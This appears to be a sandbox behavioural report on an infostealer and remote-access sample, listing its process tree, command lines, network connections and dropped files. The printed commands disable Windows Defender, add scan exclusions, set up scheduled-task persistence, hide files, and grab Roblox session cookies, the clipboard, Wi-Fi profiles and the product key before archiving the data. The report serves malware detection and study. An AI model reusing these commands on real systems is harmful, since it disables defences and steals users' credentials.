PID 3404 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2396 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4500 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3600 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3600 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3404 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 984 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 984 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4988 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4988 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3404 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1756 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 984 wrote to memory of 424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 984 wrote to memory of 424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Windows\system32\attrib.exe

attrib +h +s C:\Users\Admin\AppData\Roaming\skuld.exe

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ​  .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ​  .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC15C.tmp" "c:\Users\Admin\AppData\Local\Temp\cy3qb13v\CSC40F73E6235404006889B1BBCC9AB145C.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kZ3vu.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kZ3vu.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 147.185.221.23:33942 tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 discord.com tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp

Files

C:\Users\Admin\AppData\Roaming\eternal.exe

C:\Users\Admin\AppData\Roaming\skuld.exe

C:\Users\Admin\AppData\Roaming\program.exe

C:\Users\Admin\AppData\Local\Temp\_MEI38242\python313.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rarreg.key

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI38242\blank.aes

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_evftgzmd.cw2.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\System32\drivers\etc\hosts

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\CSC40F73E6235404006889B1BBCC9AB145C.TMP

C:\Users\Admin\AppData\Local\Temp\RESC15C.tmp

C:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\EditDismount.docx

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\ExportDeny.png

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\ShowPublish.xlsx

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\StartShow.docx

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\StartReceive.xlsx
